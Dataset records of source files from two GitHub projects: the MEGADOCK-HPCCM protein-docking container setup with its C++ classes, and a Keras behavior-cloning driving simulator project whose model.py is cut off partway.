singularity.def\n\n## or adding 'userarg' for specifying library versions\nhpccm --recipe megadock_hpccm.py --format singularity --userarg ompi=2.1.6 fftw=3.3.8 ofed=True > singularity.def\n\n## Available userargs:\n## ompi=${ompi_version} : version of OpenMPI library\n## fftw=${fftw_version} : version of FFTW library\n## ofed=${True|False} : flag for installing 'Mellanox OpenFabrics Enterprise Distribution for Linux'\n## opa=${True|False} : flag for installing Intel Omni-Path dependencies\n```\n\n
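For example, to generate a definition for an Intel Omni-Path system such as TSUBAME3.0, the userargs can be combined as follows (a usage sketch mirroring the bundled sample/singularity_ompi-2-1-2_opa.def):\n\n``` sh\nhpccm --recipe megadock_hpccm.py --format singularity --userarg ompi=2.1.2 opa=True > singularity.def\n```\n\n### 3. 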
Build Singularity image\n\n```sh\n# build a container image from the Singularity definition\nsudo singularity build megadock-hpccm.sif singularity.def\n\n## or '.simg' format (singularity < 3.2)\nsudo singularity build megadock-hpccm.simg singularity.def\n```\n\n### 4. Test with sample protein-protein pairs\n\n- **Notes:**\n - The following commands should be run on the HPC environment (a compute node with GPUs).\n - Please replace `${SINGULARITY_IMAGE}` with the **path to the container image file** on your environment.\n - **Please read the 'Singularity' section of the system manual** provided by your HPC system. You must add specific options for the singularity runtime when using system resources.\n - e.g.) Volume option (`-B XXX`) for mounting system storage, applications, libraries, etc.\n\n```sh\n# clone MEGADOCK-HPCCM repository\ngit clone https://github.com/akiyamalab/megadock_hpccm.git\ncd megadock_hpccm\n\n# singularity exec \nsingularity exec --nv ${SINGULARITY_IMAGE} \\\n mpirun -n 2 /workspace/megadock-gpu-dp -tb data/SAMPLE.table\n```\n\n### 5. Test with ZLAB benchmark dataset\n\n```sh\n# clone MEGADOCK-HPCCM repository\ngit clone https://github.com/akiyamalab/megadock_hpccm.git\ncd megadock_hpccm\n\n# download benchmark dataset (ZDOCK Benchmark 5.0)\nmkdir -p data\nwget https://zlab.umassmed.edu/benchmark/benchmark5.tgz\ntar xvzf benchmark5.tgz -C data\nrm -f benchmark5.tgz\n\n# create docking table using script (only 100 pairs)\nINTERACTIVE=1 TABLE_ITEM_MAX=100 script/makeTable.sh . data/benchmark5/structures/ \\*_r_b.pdb \\*_l_b.pdb test100pairs\n\n# Note: \n# - unset the ${TABLE_ITEM_MAX} variable to remove the limit on the number of docking calculations (all-to-all)\n# - if you need to change file paths on the compute node, use ${RUNTIME_RELATIVE_ROOT} to modify paths when generating the table.\n\n# ${SINGULARITY_IMAGE}: path to the singularity image file\n\n# singularity exec \nsingularity exec --nv ${SINGULARITY_IMAGE} \\\n mpirun -n 2 -x OMP_NUM_THREADS=20 \\\n /workspace/megadock-gpu-dp -tb table/test100pairs/test100pairs.table\n\n# singularity exec (with host MPI library)\nmpirun -n 2 -x OMP_NUM_THREADS=20 \\\n singularity exec --nv ${SINGULARITY_IMAGE} \\\n /workspace/megadock-gpu-dp -tb table/test100pairs/test100pairs.table\n```\n" }, { "alpha_fraction": 0.7308781743049622, "alphanum_fraction": 0.776203989982605, "avg_line_length": 38.22222137451172, "blob_id": "efa41b260525add55461ddb0fd6bc1b3b28aa107", "content_id": "205f010b8bab1225e192c0fc8ff63ae25df52b7b", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 354, "license_type": "permissive", "max_line_length": 116, "num_lines": 9, "path": "/megadock-scfa20/README.md", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "# MEGADOCK-scfa20\n\n## License\n\n[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)\n\n**This software and derivatives are NOT allowed for any commercial use without formal prior authorization.**\n\nCopyright © 2014-2019 Akiyama Laboratory, Tokyo Institute of Technology, All Rights Reserved.\n" }, { "alpha_fraction": 0.4863724410533905, "alphanum_fraction": 0.5072973370552063, "avg_line_length": 31.683908462524414, "blob_id": "ff0049817244961458a40656a354e4ae49cad182", "content_id": "de8cead00f825170b3444d3a100ec26869d6129c", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, 
"language": "C++", "length_bytes": 11374, "license_type": "permissive", "max_line_length": 201, "num_lines": 348, "path": "/megadock-scfa20/control_table.cpp", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2019 Tokyo Institute of Technology\n */\n\n//============================================================================//\n//\n// Software Name : MEGADOCK\n//\n// Class Name : ControlTable\n//\n// Contact address : Tokyo Institute of Technology, AKIYAMA Lab.\n//\n//============================================================================//\n\n#include \"control_table.h\"\n\n//============================================================================//\nvoid ControlTable::initialize(bool verbose)\n//============================================================================//\n{\n struct timeval et1, et2;\n gettimeofday(&et1,NULL);\n\n // Number of processors limitation\n const int thread_limit = _parameter->_Num_thread_limit;\n const int gpu_limit = _parameter->_Num_GPU_limit;\n\n if(_parallel->nproc2() > thread_limit) {\n _parallel->nproc2(thread_limit);\n }\n\n if(_parallel->num_gpu() > gpu_limit || _parallel->num_gpu() > _parallel->nproc2()) {\n _parallel->num_gpu( min(gpu_limit, (int)_parallel->nproc2()) );\n }\n if (verbose)\n printf(\"# Using %3d CPU cores, %d GPUs\\n\\n\", _parallel->nproc2(), _parallel->num_gpu());\n\n gettimeofday(&et2,NULL);\n _exec_logger->_cputime->t1_initialize += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n}\n\n//============================================================================//\n#ifdef MPI_DP\nvoid ControlTable::prepare()\n#else\nvoid ControlTable::prepare(string rec_file, string lig_file, string out_file)\n#endif\n//============================================================================//\n{\n int ngrid;\n vector<int> ngrid_table;\n\n struct timeval et1, et2;\n gettimeofday(&et1,NULL);\n\n#ifdef MPI_DP\n string rec_file = _parameter->_RecPDB_file;\n string lig_file = _parameter->_LigPDB_file;\n#else\n if (out_file == \"\") {\n _parameter->output_file_name(rec_file, lig_file);\n } else {\n string detail_ext = \".detail\", csv_ext = \".csv\";\n _parameter->_RLOut_file = out_file;\n _parameter->_RLOut_file_detail = out_file+detail_ext;\n _parameter->_RLOut_file_csv = out_file+csv_ext;\n if(_parameter->_RLOut_file.length() > 4) {\n if(_parameter->_RLOut_file.substr(_parameter->_RLOut_file.length()-4)==\".out\") {\n _parameter->_RLOut_file_detail = _parameter->_RLOut_file.substr(0,_parameter->_RLOut_file.length()-4)+detail_ext;;\n _parameter->_RLOut_file_csv = _parameter->_RLOut_file.substr(0,_parameter->_RLOut_file.length()-4)+csv_ext;;\n }\n }\n }\n#endif\n // Receptor<ParameterTable>\n _receptor = new Receptor<ParameterTable>(rec_file);\n _exec_logger->rec_filename = rec_file;\n _receptor->initialize(_parameter);\n _exec_logger->record_malloc( sizeof(float)*_receptor->num_atoms()*3 ); //Atom coordinate\n\n // Ligand<ParameterTable>\n _ligand = new Ligand<ParameterTable>(lig_file);\n _exec_logger->lig_filename = lig_file;\n _ligand->initialize(_parameter);\n _exec_logger->record_malloc( sizeof(float)*_ligand->num_atoms()*3 ); //Atom coordinate\n\n _exec_logger->_Num_fft_flag = _parameter->_Num_fft_flag;\n if( !_parameter->_Num_fft_flag ) {\n switch (_parameter->fft_base_set) {\n case 13:\n gridtable_13base_normal(ngrid,ngrid_table);\n break;\n case 7:\n gridtable_07base_normal(ngrid,ngrid_table);\n break;\n case 11:\n 
gridtable_11base_normal(ngrid,ngrid_table);\n break;\n case 0:\n gridtable_fftw_custom(ngrid,ngrid_table);\n break;\n case 1:\n gridtable_cufft_custom(ngrid,ngrid_table);\n break;\n }\n autogridr(ngrid,ngrid_table);\n autogridl(ngrid,ngrid_table);\n } else {\n checkgridr();\n checkgridl();\n }\n\n // DockingTable\n _docking = new DockingTable(_exec_logger,_parallel,_parameter,_receptor,_ligand);\n _docking->initialize();\n\n gettimeofday(&et2,NULL);\n _exec_logger->_cputime->t1_initialize += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n}\n\n//============================================================================//\nvoid ControlTable::autogridr(const int &ngrid,vector<int> &ngrid_table)\n//============================================================================//\n{\n int num_grid = 1;\n float size, size_rec = 0.0;\n\n for( int i = 0 ; i < 3 ; i++ ) {\n size = _receptor->edge(i,1) - _receptor->edge(i,0);\n \n //printf(\" %f, %f\\n\",_receptor->edge(i,1),_receptor->edge(i,0));\n\n if( size > size_rec ) {\n size_rec = size;\n }\n }\n\n _exec_logger->rec_max_size = size_rec;\n\n size_rec += 2.0 * _parameter->_Grid_space_rec;\n _exec_logger->rec_voxel_size = size_rec;\n\n num_grid = 1 + int(size_rec / _parameter->grid_width);\n\n for( int i = 0 ; i < ngrid ; i++ ) {\n if( ngrid_table[i] >= num_grid ) {\n num_grid = ngrid_table[i];\n break;\n }\n }\n\n _receptor->num_grid(num_grid);\n _exec_logger->rec_num_grid = num_grid;\n\n return;\n}\n\n//============================================================================//\nvoid ControlTable::autogridl(const int &ngrid,vector<int> &ngrid_table)\n//============================================================================//\n{\n int num_grid = 1;\n float size_lig = 0.0;\n float x1, y1, z1, x2, y2, z2, d2;\n const int na = _ligand->num_atoms();\n\n for( int i = 0 ; i < na-1 ; i++ ) {\n x1 = _ligand->coordinate(i,0);\n y1 = _ligand->coordinate(i,1);\n z1 = _ligand->coordinate(i,2);\n\n for( int j = i+1 ; j < na ; j++ ) {\n x2 = _ligand->coordinate(j,0);\n y2 = _ligand->coordinate(j,1);\n z2 = _ligand->coordinate(j,2);\n\n d2 = (x2-x1)*(x2-x1) + (y2-y1)*(y2-y1) + (z2-z1)*(z2-z1);\n\n if( d2 > size_lig ) {\n size_lig = d2;\n }\n }\n }\n\n size_lig = sqrt(size_lig);\n _exec_logger->lig_max_size = size_lig;\n\n size_lig += 2.0 * _parameter->_Grid_space_lig;\n _exec_logger->lig_voxel_size = size_lig;\n \n _parameter->ligand_max_edge = size_lig;\n\n num_grid = 1 + int(size_lig / _parameter->grid_width);\n\n for( int i = 0 ; i < ngrid ; i++ ) {\n if( ngrid_table[i] >= num_grid ) {\n num_grid = ngrid_table[i];\n break;\n }\n }\n\n _ligand->num_grid(num_grid);\n _exec_logger->lig_num_grid = num_grid;\n\n return;\n}\n\n//============================================================================//\nvoid ControlTable::checkgridr()\n//============================================================================//\n{\n float size, size_rec = 0.0;\n const int num_grid = _parameter->_Num_grid;\n const float search_length = _parameter->grid_width * num_grid;\n\n for( int i = 0 ; i < 3 ; i++ ) {\n size = _receptor->edge(i,1) - _receptor->edge(i,0);\n\n if( size > size_rec ) {\n size_rec = size;\n }\n }\n\n _exec_logger->rec_max_size = size_rec;\n\n size_rec += 2.0*_parameter->_Grid_space_rec;\n _exec_logger->rec_voxel_size = size_rec;\n\n if( size_rec > search_length ) {\n cerr << \"[ERROR] Receptor data is too big!!\\n\";\n exit(1);\n }\n\n _receptor->num_grid(num_grid);\n _exec_logger->rec_num_grid = num_grid;\n\n\n 
return;\n}\n\n//============================================================================//\nvoid ControlTable::checkgridl()\n//============================================================================//\n{\n float size_lig = 0.0;\n float x1, y1, z1, x2, y2, z2, d2;\n const int na = _ligand->num_atoms();\n const int num_grid = _parameter->_Num_grid;\n const float search_length = _parameter->grid_width * num_grid;\n\n for( int i = 0 ; i < na-1 ; i++ ) {\n x1 = _ligand->coordinate(i,0);\n y1 = _ligand->coordinate(i,1);\n z1 = _ligand->coordinate(i,2);\n\n for( int j = i+1 ; j < na ; j++ ) {\n x2 = _ligand->coordinate(j,0);\n y2 = _ligand->coordinate(j,1);\n z2 = _ligand->coordinate(j,2);\n\n d2 = (x2-x1)*(x2-x1) + (y2-y1)*(y2-y1) + (z2-z1)*(z2-z1);\n\n if( d2 > size_lig ) {\n size_lig = d2;\n }\n }\n }\n\n size_lig = sqrt(size_lig);\n _exec_logger->lig_max_size = size_lig;\n\n size_lig += 2.0*_parameter->_Grid_space_lig;\n _exec_logger->lig_voxel_size = size_lig;\n\n if( size_lig > search_length ) {\n cerr << \"[ERROR] Ligand data is too big!!\\n\";\n exit(1);\n }\n\n _ligand->num_grid(num_grid);\n _exec_logger->lig_num_grid = num_grid;\n\n _exec_logger->grid_width = _parameter->grid_width;\n\n return;\n}\n\n//============================================================================//\nvoid ControlTable::execute()\n//============================================================================//\n{\n struct timeval et1, et2;\n\n gettimeofday(&et1,NULL); // Receptor process (voxelization, forward FFT of Receptor)\n _docking->rec_init();\n gettimeofday(&et2,NULL);\n _exec_logger->_cputime->t2_receptor_process += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n\n gettimeofday(&et1,NULL); // docking\n _docking->dockz();\n gettimeofday(&et2,NULL);\n _exec_logger->_cputime->t3_docking_total += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n\n if(_parameter->detail_output_flag == 1) { // detailed result output\n gettimeofday(&et1,NULL);\n _docking->output_detail();\n gettimeofday(&et2,NULL);\n _exec_logger->_cputime->t4_docking_output_detail += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n }\n\n if(_parameter->calc_time_log_output_flag >= 1) { // calculation info\n _docking->output_calc_time_log();\n }\n\n gettimeofday(&et1,NULL); // normal result output\n _docking->output();\n gettimeofday(&et2,NULL);\n _exec_logger->_cputime->t5_docking_output += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n\n _docking->dock_memory_free();\n\n const int ng1 = _parameter->_Num_grid;\n const int ng3 = ng1*ng1*ng1;\n const int nf1 = ng1*2;\n const int nf3 = nf1*nf1*nf1;\n const int nproc2 = _parallel->nproc2();\n const int natom = _parameter->_Num_atom_max;\n const int nag = natom * ng1;\n const size_t _Memfw = ng3*3+natom*3+nag*3;\n const size_t _Memiw = ng3*2+natom*4;\n\n //delete docking include delete fft_process, _FFT_rec_r/i[nf3], _FFTWin/out[nf3*nproc2]\n _exec_logger->record_free( sizeof(float)*nf3*2 + sizeof(fftwf_complex)*nf3*2*nproc2);\n#ifdef CUFFT\n _exec_logger->record_free( sizeof(cufftComplex)*nf3*2 ); //_in/outBuf\n#endif\n _exec_logger->record_free( sizeof(float)*_Memfw*nproc2 + sizeof(int)*_Memiw*nproc2 ); //_F/Iwork\n delete _docking;\n _exec_logger->record_free( sizeof(float)*_ligand->num_atoms()*3 );\n delete _ligand;\n _exec_logger->record_free( sizeof(float)*_receptor->num_atoms()*3 );\n delete _receptor;\n _exec_logger->record_free( sizeof(float)*_parameter->_Num_rot_angles*3 + 
sizeof(unordered_map<string,float>)*(_parameter->_Charmmr.size() + _parameter->_Charmmc.size() + _parameter->_ACE.size()) );\n //delete _parameter;\n\n\n return;\n}\n" }, { "alpha_fraction": 0.5095164775848389, "alphanum_fraction": 0.5169752836227417, "avg_line_length": 28.67938995361328, "blob_id": "1275b67380ec0ca8a7105438ff90d5454197fba0", "content_id": "2199b2c7783221d8b0ce541bc8728c74b01c5d3b", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3888, "license_type": "permissive", "max_line_length": 195, "num_lines": 131, "path": "/megadock-scfa20/parameter.h", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2019 Tokyo Institute of Technology\n */\n\n//============================================================================//\n//\n// Software Name : MEGADOCK\n//\n// Class Name : Parameter\n//\n// Contact address : Tokyo Institute of Technology, AKIYAMA Lab.\n//\n//============================================================================//\n\n#ifndef Parameter_h\n#define Parameter_h 1\n\n#include <string>\n#include <iostream>\n#include <fstream>\n#include <sstream>\n#include <vector>\n#include <unordered_map>\n#include <cassert>\n#include <unistd.h>\n\n#include \"constant.h\"\n#include \"parallel.h\"\n\nusing namespace std;\n\nclass Parameter\n{\nprivate:\n friend class ControlPDB;\n template<class P, class F> friend class Docking;\n template<class P> friend class FFTProcess;\n friend class ControlTable;\n Parameter(Parameter &c) {}\n template<class P> friend class Protein;\n const Parameter & operator=(const Parameter &c);\n Parallel *_parallel;\n\nprotected:\n string _RLOut_file;\n string _RLOut_file_detail; \n string _RLOut_file_csv;\n string\t\t\t calc_id;\n int detail_output_flag;\n int calc_time_log_output_flag;\n\n int _Num_grid;\n int _Num_fft;\n int _Num_fft_flag;\n int\t\t\t\t _Num_atom_max;\n int _Num_output;\n int _Num_output_flag;\n int _Num_thread_limit;\n int _Num_GPU_limit;\n\n int _Score_func;\n int _Num_sort;\n float _Elec_ratio;\n float _ACE_ratio;\n float grid_width;\n float ligand_max_edge;\n int _Rotation_angle_set;\n int fft_base_set;\n int lig_elec_serial_flag;\n int\t\t\t\t fft_library_type;\n\n int\t\t\t\t tem_flag1;\n int\t\t\t\t tem_flag2;\n int\t\t\t\t tem_flag3;\n int\t\t\t\t tem_flag4;\n int f1_flag;\n int f2_flag;\n\n int _Old_voxel_flag;\n float _Grid_space_rec;\n float _Grid_space_lig;\n //rPSC tuning\n float _rPSC_param_rec_core;\n float _rPSC_param_lig_core;\n\n float *_Zangle;\n int _Num_rot_angles;\n unordered_map<string,float> _Charmmr;\n unordered_map<string,float> _Charmmc;\n unordered_map<string,float> _ACE;\n virtual void default_param();\n virtual void parameter_set();\n virtual void charmm_radius();\n virtual void charmm_charge();\n virtual void ace_value();\n virtual void dangle_rot1();\n virtual void dangle_rot3();\n virtual void dangle_rot24();\n virtual void dangle_rot360();\n virtual void dangle_rot3600();\n virtual void dangle_rot54000();\n\npublic:\n Parameter(Parallel *pparallel) : _parallel(pparallel) {\n#ifdef DEBUG\n cout << \"Constructing Parameter.\\n\";\n#endif\n }\n virtual ~Parameter() {\n#ifdef DEBUG\n cout << \"Destructing Parameter.\\n\";\n#endif\n delete [] _Zangle;\n }\n#ifdef MPI_DP\n virtual void initialize();\n#else\n virtual void initialize(int argc,char *argv[]);\n#endif\n virtual void process_args(int argc,char *argv[]) = 0;\n virtual float 
atom_radius(const string &atype);\n virtual float atom_charge(const string &atype);\n virtual float atom_ace(const string &atype);\n virtual int allocate_size() {\n return sizeof(float)*_Num_rot_angles*3 + sizeof(unordered_map<string,float>)*(this->_Charmmr.size() + this->_Charmmc.size() + _ACE.size()); //Rotation angles[], Atom radius, charge, ACE[]\n }\n};\n\nvoid usage();\n\n#endif\n" }, { "alpha_fraction": 0.6063183546066284, "alphanum_fraction": 0.6111786365509033, "avg_line_length": 27.379310607910156, "blob_id": "e7a3b5a4f546936d4c96fc303e84d85a497f118b", "content_id": "1a72f6d76940e173d34fa82a762ce818f79f7876", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1646, "license_type": "permissive", "max_line_length": 85, "num_lines": 58, "path": "/megadock-scfa20/docking_pdb.h", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2019 Tokyo Institute of Technology\n */\n\n//============================================================================//\n//\n// Software Name : MEGADOCK\n//\n// Class Name : DockingPDB\n//\n// Contact address : Tokyo Institute of Technology, AKIYAMA Lab.\n//\n//============================================================================//\n\n#ifndef DockingPDB_h\n#define DockingPDB_h 1\n\n#include \"docking.h\"\n#include \"cpu_time.h\"\n#include \"parameter_pdb.h\"\n#include \"fft_process_pdb.h\"\n\nusing namespace std;\n\nclass DockingPDB : public Docking<ParameterPDB, FFTProcessPDB>\n{\nprivate:\n CPUTime *_cputime;\n float **_Mol_coord;\nprotected:\n virtual void maxsize_voxel();\n virtual void alloc_array(const int &maxatom, const int &nag, const size_t &ng3);\n virtual void create_voxel(Protein<ParameterPDB> *rprotein, size_t myid2);\n virtual void ligand_rotationz(float *theta, size_t myid2);\npublic:\n DockingPDB(CPUTime *pcputime,Parallel *pparallel,ParameterPDB *pparameter,\n Receptor<ParameterPDB> *rreceptor,Ligand<ParameterPDB> *rligand)\n : _cputime(pcputime),Docking(pparallel,pparameter,rreceptor,rligand) {\n#ifdef DEBUG\n cout << \"Constructing DockingPDB.\\n\";\n#endif\n }\n virtual ~DockingPDB() {\n#ifdef DEBUG\n cout << \"Destructing DockingPDB.\\n\";\n#endif\n delete [] _Mol_coord;\n }\n virtual void initialize();\n virtual void rec_init();\n virtual void dockz();\n virtual void dock_memory_free();\n virtual void output();\n virtual void output_detail(); // for analysis\n virtual void output_calc_time_log(); // for analysis\n};\n\n#endif\n" }, { "alpha_fraction": 0.6201799511909485, "alphanum_fraction": 0.6233932971954346, "avg_line_length": 24.933332443237305, "blob_id": "23632c9c44bdce5990c9560156555ebe72662d41", "content_id": "dd683267077e5371368550e071f3ec5fbcd2964e", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1556, "license_type": "permissive", "max_line_length": 98, "num_lines": 60, "path": "/megadock-scfa20/control_table.h", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2019 Tokyo Institute of Technology\n */\n\n//============================================================================//\n//\n// Software Name : MEGADOCK\n//\n// Class Name : ControlTable\n//\n// Contact address : Tokyo Institute of Technology, AKIYAMA 
Lab.\n//\n//============================================================================//\n\n#ifndef ControlTable_h\n#define ControlTable_h 1\n\n#include \"control.h\"\n#include \"exec_logger.h\"\n#include \"parameter_table.h\"\n#include \"docking_table.h\"\n\nusing namespace std;\n\nclass ControlTable : public Control<ParameterTable, DockingTable>\n{\nprivate:\n ExecLogger *_exec_logger;\nprotected:\n virtual void autogridr(const int &ngrid,vector<int> &ngrid_table);\n virtual void autogridl(const int &ngrid,vector<int> &ngrid_table);\n virtual void checkgridr();\n virtual void checkgridl();\npublic:\n ControlTable(ExecLogger *pexec_logger,Parallel *pparallel,ParameterTable *pparameter)\n : _exec_logger(pexec_logger),Control<ParameterTable, DockingTable>(pparallel,pparameter) {\n#ifdef DEBUG\n cout << \"Constructing ControlTable.\\n\";\n#endif\n }\n virtual ~ControlTable() {\n#ifdef DEBUG\n cout << \"Destructing ControlTable.\\n\";\n#endif\n }\n virtual void initialize(bool verbose);\n#ifdef MPI_DP\n virtual void prepare();\n#else\n virtual void prepare(string rec_file, string lig_file, string out_file);\n#endif\n virtual void execute();\n#ifndef MPI_DP\n virtual string input_file() {\n return _parameter->_Table_file;\n }\n#endif\n};\n\n#endif\n" } ]
31
mathieu-wang/carnd-behavior-cloning
https://github.com/mathieu-wang/carnd-behavior-cloning
3dc408800c1df95daf82076d9b0197077f2a0d52
7d6ef5b2f2e43fbebfc6f438c6f492f1fc1d83d8
c74e8f44c074ceb342659f66c4df6bffe8f7a6fb
refs/heads/master
2021-01-25T05:56:37.263900
2017-02-02T09:29:09
2017-02-02T09:29:09
80,706,153
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6599479913711548, "alphanum_fraction": 0.6807542443275452, "avg_line_length": 29.465347290039062, "blob_id": "13f6e75746b3089ba1006082655335f5e4960652", "content_id": "e02bd9020190b97148944b14810734b7e7c46147", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3076, "license_type": "no_license", "max_line_length": 125, "num_lines": 101, "path": "/drive.py", "repo_name": "mathieu-wang/carnd-behavior-cloning", "src_encoding": "UTF-8", "text": "import argparse\nimport base64\nimport json\n\nimport numpy as np\nimport socketio\nimport eventlet\nimport eventlet.wsgi\nimport time\nfrom PIL import Image\nfrom PIL import ImageOps\nfrom flask import Flask, render_template\nfrom io import BytesIO\n\nfrom keras.models import model_from_json\nfrom keras.preprocessing.image import ImageDataGenerator, array_to_img, img_to_array\nimport cv2\n\n# Fix error with Keras and TensorFlow\nimport tensorflow as tf\ntf.python.control_flow_ops = tf\n\n\nsio = socketio.Server()\napp = Flask(__name__)\nmodel = None\nprev_image_array = None\n\[email protected]('telemetry')\ndef telemetry(sid, data):\n #print(data)\n # The current steering angle of the car\n steering_angle = data[\"steering_angle\"]\n # The current throttle of the car\n throttle = data[\"throttle\"]\n # The current speed of the car\n speed = data[\"speed\"]\n # The current image from the center camera of the car\n imgString = data[\"image\"]\n image = Image.open(BytesIO(base64.b64decode(imgString)))\n image_array = np.asarray(image)\n\n #image_array = sp.imresize(image_array, size=shape, interp='cubic')\n image_array = preprocess(image_array)\n\n transformed_image_array = image_array[None, :, :, :]\n steering_angle = float(model.predict(transformed_image_array, batch_size=1)) * 2 # double angle to have enough correction\n\n # Set the throttle according to current speed and steering angles.\n # Gradually slow down as steering angle increases\n if float(speed) > 15.0: # Max speed of 15\n throttle = 0\n elif float(speed) < 5.0: # Min speed of 5\n throttle = 0.1\n elif 0.05 <= abs(steering_angle) < 0.10:\n throttle = -0.1\n elif 0.10 <= abs(steering_angle) < 0.2:\n throttle = -0.2\n elif 0.2 <= abs(steering_angle):\n throttle = -0.4\n else:\n throttle = 0.2\n print(steering_angle, throttle)\n send_control(steering_angle, throttle)\n\n\[email protected]('connect')\ndef connect(sid, environ):\n print(\"connect \", sid)\n send_control(0, 0)\n\n\ndef send_control(steering_angle, throttle):\n sio.emit(\"steer\", data={\n 'steering_angle': steering_angle.__str__(),\n 'throttle': throttle.__str__()\n }, skip_sid=True)\n\n# Preprocessing (same as in model.py)\ndef preprocess(image, width=200, height=66):\n processed = image[60:130, 0:320]\n processed = cv2.resize(processed, (width, height), interpolation = cv2.INTER_CUBIC)\n return processed\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Remote Driving')\n parser.add_argument('model', type=str,\n help='Path to model definition json. 
Model weights should be on the same path.')\n args = parser.parse_args()\n with open(args.model, 'r') as jfile:\n model = model_from_json(json.loads(jfile.read()))\n\n model.compile(\"adam\", \"mse\")\n weights_file = args.model.replace('json', 'h5')\n model.load_weights(weights_file)\n\n # wrap Flask application with engineio's middleware\n app = socketio.Middleware(sio, app)\n\n # deploy as an eventlet WSGI server\n eventlet.wsgi.server(eventlet.listen(('', 4567)), app)" }, { "alpha_fraction": 0.7891566157341003, "alphanum_fraction": 0.8039156794548035, "avg_line_length": 173.73684692382812, "blob_id": "cd36775e2211e0c1405442294155045f0d77975b", "content_id": "4c6102bd137924480d52ca298caebe102bfd724c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3320, "license_type": "no_license", "max_line_length": 953, "num_lines": 19, "path": "/README.md", "repo_name": "mathieu-wang/carnd-behavior-cloning", "src_encoding": "UTF-8", "text": "# carnd-behavior-cloning\n\n# Architecture\nThis project uses the architecture designed by NVIDIA's self-driving car team and documented in http://images.nvidia.com/content/tegra/automotive/images/2016/solutions/pdf/end-to-end-dl-using-px.pdf.\nThe inputs consist of 66x200 RGB images, which are first normalized, then passed through 5 convolutional layers and 3 fully connected layers to finally produce a single float value representing the steering angle.\nIn order to prevent overfitting, a dropout layer of 0.5 is used after each convolutional layer.\n\n# Approach to Problem\nBefore implementing the solution pipeline, some analysis work was done to better understand the data and to prepare for debugging the pipeline and model later on.\nFirst, the CSV file containing the Udacity-provided training data was read and organized into different lists with the same indexing for easier access. The data was then validated by counting the number of elements in each property's list and making sure they all have the same length. A total of 8036 training records was found.\nThen, 3 data records were chosen to be analyzed. One was a left turn, one was a snapshot of the car going straight, and the third was a right turn. The images and their corresponding steering angles (one negative, one zero, and one positive) were visualized, which made it possible to design the preprocessing algorithm: crop the top and bottom parts of the images, and resize to 66x200 to use them as inputs to the model.\nFinally, using the 3 test images and their steering angles, the pipeline was developed and debugged, and a full model was trained.\nThe training is done through a generator, which selects one index at random from the original training records, and generates 6 images with their corresponding steering angles: the left, center, and right camera images with steering corrections, as well as the symmetries of the 3 images with respect to the vertical axis. For the training itself, a total of 8000 x 6 = 48000 samples were used. Since the generator chooses an index at random, the 48000 samples (8000 indices) will not cover all training records, and will use some of them more than once. However, for model training purposes, this is a good enough approach. This also makes sure that the data is shuffled between each of the 5 training epochs. For the training step, an Adam optimizer with a mean squared error metric was used. 
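In code, the training step boils down to the following two calls, condensed from model.py in this repository:\n\n```python\nmodel.compile('adam', 'mean_squared_error', ['accuracy'])\nmodel.fit_generator(generate_data(), samples_per_epoch=48000, nb_epoch=5) # ~8000 records x 6 generated samples per record\n```\n\n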
Note that no validation set was created because the accuracy is not meaningful in this case, and the only real measurement of accuracy is testing in the simulator.\n\n# Testing and Results\nIn order to test the model in the simulator, the drive.py script had to be slightly modified.\nFirst, the same preprocessing steps are applied to the image from telemetry.\nThen, the predicted steering angle was used, along with the current speed of the vehicle to adjust the throttle and steering angle of the car. Maximum and minimum speeds of 15 and 5 mi/hr were selected to balance between lap time and handling. Also, the throttle is controlled such that the car would slow down when the steering angle is large in either direction (a turn), and accelerate when the angle is small (straight line).\nUsing the model and pipeline described above, the car is able to run multiple laps in a row in the simulator.\n" }, { "alpha_fraction": 0.682503879070282, "alphanum_fraction": 0.7037924528121948, "avg_line_length": 29.174468994140625, "blob_id": "09449c3f91aff4ca9afad51c1ca1d531e410e25c", "content_id": "a2c31d9e14772436d9ac7209649f003f60a8ff56", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7093, "license_type": "no_license", "max_line_length": 129, "num_lines": 235, "path": "/model.py", "repo_name": "mathieu-wang/carnd-behavior-cloning", "src_encoding": "UTF-8", "text": "\n# coding: utf-8\n\n# In[13]:\n\n# imports\nimport csv\nimport tensorflow as tf\nimport keras\nimport keras.backend.tensorflow_backend as KTF\nimport cv2\nimport numpy as np\n\n\n\n# In[14]:\n\nspeed = []\nthrottle = []\nleft = []\ncenter = []\nright = []\nsteering = []\n\n# Load driving log:\nwith open('data/driving_log.csv') as csvfile:\n reader = csv.DictReader(csvfile)\n for row in reader:\n speed.append(float(row['speed']))\n 